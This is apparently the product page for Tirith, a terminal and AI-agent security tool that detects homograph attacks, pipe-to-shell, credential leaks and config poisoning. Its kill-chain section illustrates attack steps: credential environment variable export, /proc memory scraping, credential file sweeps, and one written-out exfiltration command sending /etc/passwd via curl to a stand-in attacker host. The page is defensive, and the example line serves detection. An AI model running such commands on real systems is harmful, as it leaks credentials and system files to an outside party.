Your terminal won't.
Tirith intercepts commands and pastes in your terminal, detecting homograph attacks, pipe-to-shell patterns, ANSI injection, credential leaks, data exfiltration, and 200+ other threats, in under 1ms.
See It In Action #
Click a scenario to see how Tirith responds.
What It Catches #
208 detection rules across 29 threat categories, covering every angle of terminal and AI-agent attack surface.
Hostname & Homograph
Homograph attacks, punycode, confusable characters, IDN spoofing
Terminal Injection
ANSI escapes, bidi overrides, zero-width and control characters
Command Execution
Pipe-to-shell, decode-execute, command substitution, and dangerous invocations
Credential Detection
API keys, tokens, private keys, and high-entropy secrets in input
Supply Chain & Ecosystem
Git, Docker, pip, npm, registries — package and supply-chain attack surface
Config Security
AI config poisoning, prompt injection, and MCP server validation
AI Config Drift
Snapshot-diff changes to AI configs: hidden instructions and tool-use escalation
Threat Intelligence
Known-malicious packages, URLs, and IPs from the signed threat database
Code Execution
Executing from tmp/untrusted locations and dynamic or obfuscated execution
Contextual Safety
Production cloud/k8s, labeled SSH hosts, IaC apply/destroy, and container exec
Hidden Content
Hidden CSS/color text, comments, and notebook/HTML hidden instructions
Cloaking
Servers returning different content to AI bots vs browsers
Supply Chain Is the New Attack Surface #
TeamPCP compromised LiteLLM, Aqua Trivy, and Checkmarx in 5 days. No zero-day needed, just stolen credentials and commands your terminal happily executed.
Tirith won't stop a trojaned package from being installed. But it catches the payload before it does damage, cutting the blast radius at every stage of the kill chain.
Initial Access
Attack
Stolen credentials used to push trojaned package
LiteLLM, Aqua Trivy, Checkmarx, all in 5 days
Tirith Response
Outside terminal scope. Tirith guards what runs after install.
Credential Harvesting
Attack
Payload exports API keys, tokens, and secrets from env vars
$AWS_SECRET_ACCESS_KEY, $GITHUB_TOKEN, $ANTHROPIC_API_KEY
Tirith Response
sensitive_env_export
Memory Scraping
Attack
Reads /proc/*/mem to extract secrets from running processes
Every secret in your CI runner or dev machine memory
Tirith Response
proc_mem_access
Privilege Escalation
Attack
Mounts host root filesystem via Docker remote daemon
Full host access from inside a container
Tirith Response
docker_remote_priv_esc
Persistence
Attack
Sweeps .aws/credentials, .ssh/id_rsa, .gnupg/ for lateral movement
Every credential file on disk
Tirith Response
credential_file_sweep
Exfiltration
Attack
Uploads stolen data to attacker-controlled server via curl
curl -d @/etc/passwd https://c2.attacker.com/collect
Tirith Response
data_exfiltration
5 of 6 kill chain stages intercepted
Tirith can't prevent a compromised package from being published. But every post-install payload (credential theft, memory scraping, privilege escalation, exfiltration) gets caught before it does damage. That's the difference between a breach and a blocked command.
How It Works #
A 3-tier pipeline that balances speed with thoroughness.
Fast Gate
Regex-powered initial filter eliminates 99% of clean commands instantly.
Extract
Parses URLs, Docker references, and package identifiers from complex commands.
Analyze
200+ rules across 29 categories: homographs, injection, supply-chain, threat intel, credential detection, AI-config drift, and more.
AI Agent Security #
Protect AI coding agents at every layer, from the configs they read to the skills they download to the commands they execute. One command to set up. Zero friction on clean input.
MCP Server: 7 Tools
AI agents call these tools before taking action. Run tirith mcp-server
to start.
tirith_check_command
Analyze shell commands
tirith_check_url
Score URLs for attacks
tirith_check_paste
Check pasted content
tirith_scan_file
Scan files for hidden content
tirith_scan_directory
Recursive directory scan
tirith_verify_mcp_config
Validate MCP configs
tirith_fetch_cloaking
Detect server-side cloaking
Skill & Plugin Scanning
Download skills, plugins, and MCP tools without worrying. Tirith scans every file for obfuscated payloads, dynamic code execution, and secret exfiltration before your agent runs it.
Config Poisoning
Scans 50+ AI config file patterns (.cursorrules, CLAUDE.md, .mcp.json, and more) for prompt injection, invisible Unicode, and permission bypass attempts.
Hidden Content
Detects content invisible to humans but readable by AI: CSS hiding, color tricks, sub-pixel PDF text, and HTML comment injection.
Server Cloaking
Compares responses across 6 user-agents to catch servers that serve different content to AI bots vs browsers.
AI Config Drift
Snapshot your AI configs, then diff to catch hidden instructions or tool-use escalation slipped in since — via tirith ai snapshot and tirith ai diff.
Editor Diagnostics (LSP)
tirith lsp publishes findings inline in your editor as you open and edit AI configs, install docs, and source files.
One Command Setup
Commands #
Everything runs locally. Zero network calls unless you explicitly ask.
Analyze
| tirith check -- <cmd> | Analyze a command without executing it | | tirith paste | Check pasted content (auto-called by shell hooks) | | tirith scan [path] | Scan files/dirs for hidden content, config poisoning, malicious code. Supports --sarif and --ci --fail-on high | | tirith run <url> | Safe curl|bash replacement. Downloads, analyzes, shows SHA256, opens for review, executes after confirmation | | tirith explain --rule <id> | Docs, examples, and remediation for any of the 200+ rule IDs |
Investigate
| tirith score <url> | Break down a URL's trust signals | | tirith diff <url> | Byte-level comparison showing where suspicious characters hide | | tirith fetch <url> | Detect server-side cloaking (different content for bots vs browsers) | | tirith why | Explain the last rule that triggered |
AI & Editor
| tirith ai | Snapshot and diff AI configs for hidden-instruction & tool-use drift (scan, diff, quarantine, snapshot) | | tirith lsp | Language Server for inline editor diagnostics as you edit configs, docs, and code | | tirith mcp-server | Run as MCP server over JSON-RPC stdio (7 tools) | | tirith setup <tool> | One-command setup for Claude Code, Codex, Cursor, VS Code, Windsurf | | tirith gateway run | MCP gateway proxy for intercepting AI agent shell tool calls |
Policy & Trust
| tirith onboard | Detect your repo and environment, then recommend a policy template | | tirith policy | Scaffold, validate, test, and tune .tirith/policy.yaml (init, validate, test, tune) | | tirith rule | Author custom regex or semantic when:-DSL detection rules (test, validate, explain) | | tirith trust | Manage trusted patterns, narrow + 30-day TTL by default (add, list, explain, gc) | | tirith threat-db | Update and query the signed threat database (update, status, explain, sources) |
Operate
| tirith receipt | Track and verify scripts run through tirith run (last, list, verify) | | tirith checkpoint | Snapshot files before risky operations, roll back if needed (create, restore, diff) | | tirith dashboard | Local security dashboard from the audit log (export, serve) | | tirith audit | Audit log management for compliance (export, stats, report) | | tirith doctor | Diagnostics for hooks, policy, and setup (--quick, --fix, --compat) | | tirith init | Print the shell hook for your shell profile |
Free for Everyone. Built for Teams. #
All detection rules run at every tier. Paid plans add compliance, policy distribution, and enterprise integrations.
Community
Free forever
Everything you need for terminal security. No account required.
- ✓Full detection engine (all 200+ rules)
- ✓Shell hooks: Bash, Zsh, Fish, PowerShell
- ✓MCP server for AI coding tools
- ✓Local JSONL audit log
- ✓YAML policy system
- ✓SARIF output for CI/CD
- ✓Zero network calls, fully offline
- ✓Cross-platform: macOS, Linux, Windows
- ✓Open source
Team / Enterprise
Contact us
Everything in Community, plus:
- MITRE ATT&CK technique mapping
- Remote policy distribution
- Centralized audit log collection
- Custom DLP redaction patterns
- Webhooks: Slack, Teams, PagerDuty
- SSO/SAML: Okta, Azure AD
- Air-gapped / on-premises deployment
- Dedicated account manager & SLA
Installation #
Install Tirith with your favorite package manager.
brew install sheeki03/tap/tirith
Shell Activation
eval "$(tirith init --shell zsh)"
eval "$(tirith init --shell bash)"
tirith init --shell fish | source